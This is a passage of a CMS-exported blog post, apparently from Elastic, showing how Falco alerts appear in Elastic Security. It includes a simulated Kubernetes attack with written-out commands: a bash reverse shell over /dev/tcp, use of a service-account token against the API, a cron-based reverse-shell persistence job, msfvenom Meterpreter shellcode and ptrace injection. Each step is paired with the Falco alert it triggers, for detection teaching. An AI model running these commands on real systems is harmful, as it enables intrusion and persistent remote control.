alerts that are generated through Falco in the Elastic Security alert overview.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Falco alerts","_metadata":{"uid":"csa35e4de8fd271b0a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSimilar to Elastic’s prebuilt and custom SIEM and endpoint rules provided by Elastic Security, the alerts generated by Falco are also ingested, parsed, and displayed in the centralized Elastic Security Alerts overview. The only prerequisite to have the Falco alerts displayed in the Security Alerts overview is to enable the “External Alerts” rule in the Detection Rules menu:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csd6a768d3e536e4db"}}},{"image":{"image":{"uid":"blt2fc96e958f8415fe","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-13T01:15:36.197Z","created_by":"bltb6c155cd84fc0c1a","file_size":"93102","filename":"image7.png","parent_uid":null,"tags":[],"title":"image7.png","updated_at":"2024-11-13T01:15:36.197Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-15T15:00:03.741Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt2fc96e958f8415fe/6733fdb8a3eb8e06493e2456/image7.png"},"_metadata":{"uid":"cs34a0cb1456af6d77"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cse4fc74ee82a8607b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis rule queries any of the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003elogs-*\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e indices for documents that contain the following:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs7dd15990bfec2718"}}},{"code":{"code":"event.kind:alert and not event.module:(endgame or endpoint or cloud_defend)","_metadata":{"uid":"cs551f60949fa4790d"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs6649a6fb1ac6a658"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs the Falco documents are ingested with \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eevent.kind\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e of \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ealert\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, this rule promotes these documents to the Elastic Security Alerts overview as displayed below:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csbddd860d13981b93"}}},{"image":{"image":{"uid":"blt781152a15e84807d","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-13T01:17:03.522Z","created_by":"bltb6c155cd84fc0c1a","file_size":"258901","filename":"image10.png","parent_uid":null,"tags":[],"title":"image10.png","updated_at":"2024-11-13T01:17:03.522Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-15T15:00:03.678Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt781152a15e84807d/6733fe0f3bea8f1cbb12364d/image10.png"},"_metadata":{"uid":"csa9d6e534b0376d8d"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs5ee1af895c4b0679"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe can interact with these alerts similarly to how we would normally interact with any other alert. This means that we can assign users to the alert and assign the alert to a case:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs5453eccd0df7fa02"}}},{"image":{"image":{"uid":"blt4893bb988f9e765f","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-13T01:18:04.911Z","created_by":"bltb6c155cd84fc0c1a","file_size":"311881","filename":"image1.png","parent_uid":null,"tags":[],"title":"image1.png","updated_at":"2024-11-13T01:18:04.911Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-15T15:00:03.790Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt4893bb988f9e765f/6733fe4cf41370772e7c838a/image1.png"},"_metadata":{"uid":"cseb61008e9aca5130"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csd83188a57c2c2dfd"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAdditionally, we can add rule exceptions to any Falco rule:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs55355b52235c0779"}}},{"image":{"image":{"uid":"blt029bff343d83664e","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-13T01:18:56.849Z","created_by":"bltb6c155cd84fc0c1a","file_size":"145173","filename":"image17.png","parent_uid":null,"tags":[],"title":"image17.png","updated_at":"2024-11-13T01:18:56.849Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-15T15:00:03.622Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt029bff343d83664e/6733fe804b891d35b871c388/image17.png"},"_metadata":{"uid":"csdfec0a7496516a96"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csec0a3b17f5392293"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith the integration of Falco alerts into Elasticsearch and the use of ECS for standardization, centralized alert management and analysis become not only feasible but also highly efficient.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Falco cloud workload protection scenario","_metadata":{"uid":"cs442a896829c443f3"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn this section, we will walk through an attack simulation in a Kubernetes environment. These steps will simulate an attacker gaining access to a cloud workflow environment and Falco detecting these steps along the way.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eA quick overview of the attack:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eInitial access:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Exploit a vulnerable web application inside a Kubernetes Pod using \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ebash\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e for a reverse shell.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ePod discovery:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Identify the nodes's privileges and explore its environment.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ePod escape:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Use a shared mount point to escalate to the Kubernetes host.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eHost persistence:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Set up a new user account and schedule persistence via \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ecron\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ePtrace execution of a payload:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Execute a process injection payload simulating the desired end goal of hijacking a process on the Kubernetes host.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn practice this could look similar to the following:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eInitial access via vulnerable web app\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003eThe attacker exploits a remote code injection vulnerability in a webserver running on a Kubernetes Pod and creates a reverse shell via \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ebash\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e to allow for arbitrary execution. From here, the attacker runs\u0026nbsp;\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ewhoami\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e to determine what level of access is available.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cseb912c0d1fc0a491"}}},{"code":{"code":"root@attacker ❯ curl \"http://192.168.22.123:3000/?cmd=bash%20-i%20%3E%26%20/dev/tcp/192.168.1.124/4444%200%3E%261\"\n\nroot@attacker ❯ nc -lvnp 4444\nListening on 0.0.0.0 4444\nConnection received on 192.168.49.2 53028\nroot@vulnerable-pod:/# whoami\nwhoami\nroot","_metadata":{"uid":"cs76070d660b3f3ea6"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs45fe49163d4b621e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003eFalco detection rule alerts:\u0026nbsp;\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003eBasic Interactive Reconnaissance\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003eRedirect STDOUT/STDIN to Network Connection in Container\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003eSystem procs network activity\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003eTerminal shell in container\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs506d5fd8e7bd9803"}}},{"image":{"image":{"uid":"blt83d7331442c5bee7","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-13T01:22:26.793Z","created_by":"bltb6c155cd84fc0c1a","file_size":"166872","filename":"image5.png","parent_uid":null,"tags":[],"title":"image5.png","updated_at":"2024-11-13T01:22:26.793Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-15T15:00:03.572Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt83d7331442c5bee7/6733ff52f413705ea27c838e/image5.png"},"_metadata":{"uid":"cs63732485065b2db9"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csf7fb3a8ea229b10d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eNode discovery\u003cbr bold=\"[object Object]\"/\u003e\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIdentify the nodes's privileges and explore its environment.\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eFirst, we can examine the environment variables to see if we can uncover any secrets. Depending on the secrets discovered, the attacker can pivot to take advantage of what information is uncovered.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs02d7c6d5a603e883"}}},{"code":{"code":"root@nginx-76d6c9b8c-64dl2:/# env\n[...]\nKUBERNETES_SERVICE_PORT_HTTPS=443\nKUBERNETES_SERVICE_PORT=443\nKUBERNETES_SERVICE_HOST=10.96.0.1\nKUBERNETES_PORT=tcp://10.96.0.1:443\nKUBERNETES_PORT_443_TCP_PORT=443","_metadata":{"uid":"cs02586c2be6d845fe"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csd02a60fd5483b70a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFrom here, we can see that we are likely in a Kubernetes environment due to the environment variables. We can then use the default values expected to be on the pod to make calls to the internal Kubernetes API and see what permissions we have:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs1d3806f99b1349b0"}}},{"code":{"code":"root@nginx-76d6c9b8c-64dl2:/# APISERVER=https://kubernetes.default.svc\nSERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount\nNAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)\nTOKEN=$(cat ${SERVICEACCOUNT}/token)\nCACERT=${SERVICEACCOUNT}/ca.crt\n\nroot@nginx-76d6c9b8c-64dl2:/# curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\" -X GET ${APISERVER}/api\n{\n \"kind\": \"APIVersions\",\n \"versions\": [\n \"v1\"\n ],\n \"serverAddressByClientCIDRs\": [\n {\n \"clientCIDR\": \"0.0.0.0/0\",\n \"serverAddress\": \"192.168.49.2:8443\"\n }\n ]\n}","_metadata":{"uid":"csbfd0d5c7d45fa3cf"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csc00b33fcb9b21fc3"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe attacker may also try to pivot to other pods with potentially greater access. To follow this course, one may try to list the pods via an API request:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csb4c444202a8c7e6a"}}},{"code":{"code":"root@nginx-76d6c9b8c-64dl2:/# curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\" -X GET ${APISERVER}/api/v1/pods\n{\n \"kind\": \"Status\",\n \"apiVersion\": \"v1\",\n \"metadata\": {},\n \"status\": \"Failure\",\n \"message\": \"pods is forbidden: User \\\"system:serviceaccount:default:default\\\" cannot list resource \\\"pods\\\" in API group \\\"\\\" at the cluster scope\",\n \"reason\": \"Forbidden\",\n \"details\": {\n \"kind\": \"pods\"\n },\n \"code\": 403\n}","_metadata":{"uid":"cs49c5ab512c2e1e8c"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cse123af018e1fe5ea"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e\u003cstrong\u003eFalco detection rule alerts:\u0026nbsp;\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eContact K8S API Server From Container\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cse2651588ce2fc60d"}}},{"image":{"image":{"uid":"blt546fada165a28daa","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-13T01:29:21.766Z","created_by":"bltb6c155cd84fc0c1a","file_size":"131807","filename":"image11.png","parent_uid":null,"tags":[],"title":"image11.png","updated_at":"2024-11-13T01:29:21.766Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-15T15:00:03.754Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt546fada165a28daa/673400f1b836a049f9701022/image11.png"},"_metadata":{"uid":"cs92c054dc5b66cb26"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csbd95c9093ff744d1"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ePod escape via abusing mount points\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNow, it’s determined that the compromised host is a Kubernetes pod and does not have sufficient privileges to manipulate the pod API endpoint. The attacker may look to abuse trusted mount points from the Kubernetes host. One place to look for potential points of attack is in \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003e/proc/mounts\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. If found, the attacker may use this as a means of persistence through establishing a cron job or other form of recurring reverse shell.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"csb2cf678433971ad5"}}},{"code":{"code":"root@vulnerable-pod:/# cat /proc/mounts\n[...]\n/overlay2/56a42e3ce894a8962a74eda57914ea24fd674b5102c2abb48a2ab5a47ac70d10/work 0 0\n/dev/mapper/vgubuntu-root /host/etc/resolv.conf ext4 rw,relatime,errors=remount-ro 0 0\n/dev/mapper/vgubuntu-root /host/etc/hostname ext4 rw,relatime,errors=remount-ro 0 0\n/dev/mapper/vgubuntu-root /host/etc/hosts ext4 rw,relatime,errors=remount-ro 0 0\n/dev/mapper/vgubuntu-root /dev/termination-log ext4 rw,relatime,errors=remount-ro 0 0\n/dev/mapper/vgubuntu-root /etc/resolv.conf ext4 rw,relatime,errors=remount-ro 0 0\n/dev/mapper/vgubuntu-root /etc/hostname ext4 rw,relatime,errors=remount-ro 0 0\n/dev/mapper/vgubuntu-root /etc/hosts ext4 rw,relatime,errors=remount-ro 0 0\nshm /dev/shm tmpfs rw,nosuid,nodev,noexec,relatime,size=65536k,inode64 0 0\ntmpfs /run/secrets/kubernetes.io/serviceaccount tmpfs ro,relatime,size=65519908k,inode64 0 0","_metadata":{"uid":"cs495e1a28a1f1ffe3"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs32c80d3bc07754f8"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFrom this output, we can see that the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003e/etc/\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e directory has logical volume mappings for a number of the files. While this is not definitive, this can be an indication that this directory is mounted from another location, possibly from the Kubernetes host. To test this, the attacker then attempts to establish persistence in this directory by creating a cron job for a reverse shell.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs6c89f999a1be6781"}}},{"code":{"code":"root@vulnerable-pod:/# touch /etc/cron.d/reverse_shell_job\n\nroot@vulnerable-pod:/vuln# echo \"* * * * * root /bin/bash -c '/bin/bash -i \u003e\u0026 /dev/tcp/192.168.1.124/4444 0\u003e\u00261'\" \u003e /etc/cron.d/reverse_shell_job\n","_metadata":{"uid":"csc7b5fba764cf324b"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cse926af4060609dc9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis will create a cron job on the Kubernetes host that will not be lost when the pod is redeployed. Fortunately, Falco can detect these actions:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e\u003cstrong\u003eFalco detection rule alerts:\u0026nbsp;\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eSchedule Cron Jobs\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cse21b75925ce444c7"}}},{"image":{"image":{"uid":"blta4f516f6a614be14","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-13T01:28:49.979Z","created_by":"bltb6c155cd84fc0c1a","file_size":"130318","filename":"image6.png","parent_uid":null,"tags":[],"title":"image6.png","updated_at":"2024-11-13T01:28:49.979Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-15T15:00:03.690Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blta4f516f6a614be14/673400d1d1f12c4fef145840/image6.png"},"_metadata":{"uid":"cs0391a3696877df09"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csf12d5aab5d475e55"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ePtrace execution of a payload\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith persistence established, the attacker may now detonate their intended payload with the reverse shell to mitigate risk. For this example, we will attempt to run process injections to gain control of an ongoing process. For demonstrative purposes, we will use the \u003c/span\u003e\u003ca href=\"https://github.com/MatheuZSecurity/Infector\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eInfector\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e tool, specifically the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003einfect.c\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e file. An attacker using this tool could replace the shellcode constant in \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003einfect.c\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e with the shellcode of a Meterpreter payload. In our case, the attacker will generate a payload on a separate machine using \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003emsfvenom\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs5e53d4173d3cfb44"}}},{"code":{"code":"root@kali:~/$ msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.124 LPORT=4567 -f c\nNo encoder specified, outputting raw payload\nPayload size: 123 bytes\nFinal size of c file: 543 bytes\nunsigned char buf[] = \n\"\\x6a\\x0a\\x5e\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\\x6a\\x02\\xb0\\x66\"\n\"\\x89\\xe1\\xcd\\x80\\x97\\x5b\\x68\\x7f\\x00\\x00\\x01\\x68\\x02\\x00\"\n[...] \n","_metadata":{"uid":"cs90f356a547428979"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs6969c9b813e0daf6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNow, the attacker would take this shellcode output and replace the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eSHELLCODE\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e variable in \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003einfect.c\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. Afterward the attacker would compile this file and run it to inject the payload into a desired PID, in this case \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003e10247\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs4cc7f14b519d2726"}}},{"code":{"code":"root@vulnerable-pod:/etc# gcc -Wall -Wextra -g -o infect infect.c\nroot@vulnerable-pod:/etc# ./infect 10247\n[*] SUCCESSFULLY! Injected!! [*]\n","_metadata":{"uid":"cs1b1164847b026539"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs2b4de415e1663290"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e\u003cstrong\u003eFalco detection rule alerts:\u0026nbsp;\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003ePTRACE attached to process\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs3112043d21067339"}}},{"image":{"image":{"uid":"bltf142fc490d26fca1","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-13T01:34:06.985Z","created_by":"bltb6c155cd84fc0c1a","file_size":"113924","filename":"image12.png","parent_uid":null,"tags":[],"title":"image12.png","updated_at":"2024-11-13T01:34:06.985Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-15T15:00:03.843Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf142fc490d26fca1/6734020e188be347f6f07bc0/image12.png"},"_metadata":{"uid":"cs03930ba8d7cd1a40"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csbf41463059d853bf"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn this scenario, Falco was able to detect each core step our simulated attacker took. Let’s now take a look at an endpoint protection scenario.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Falco endpoint protection scenario","_metadata":{"uid":"csbc035582b14e8d89"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn this section, we will walk through an attack simulation on an endpoint. Each step will simulate an attacker's activity, followed by showing how Falco picks up these actions through its rule-based detection system. Presented below is the attack simulation overview:\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eInitial access:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Exploit a vulnerable application inside a Docker container using netcat for a reverse shell.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eContainer discovery:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Identify the container's privileges and explore its environment.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eDocker escape:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Use nsenter to escape from the container to the host system.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eHost persistence:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Set up a new user account and schedule persistence via cron.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eHost system discovery:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Conduct reconnaissance on the host system.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHere's how the 